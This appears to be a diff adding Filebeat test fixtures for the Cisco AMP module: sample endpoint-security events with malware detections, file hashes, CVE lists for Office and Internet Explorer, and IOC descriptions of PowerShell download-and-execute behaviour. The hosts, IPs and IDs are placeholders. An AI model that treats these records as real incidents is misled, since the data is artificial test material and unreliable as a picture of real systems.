Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json new file mode 100644 index 000000000000..4a602ba1c2b6 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json @@ -0,0 +1,2356 @@ +[ + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 742000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "c877b67a5733c59d0d8ed8d519df0c91", + "file.hash.sha1": "128aa78059540cf0cdae2a3cea30cd80e00f2046", + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "c877b67a5733c59d0d8ed8d519df0c91", + "128aa78059540cf0cdae2a3cea30cd80e00f2046" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + 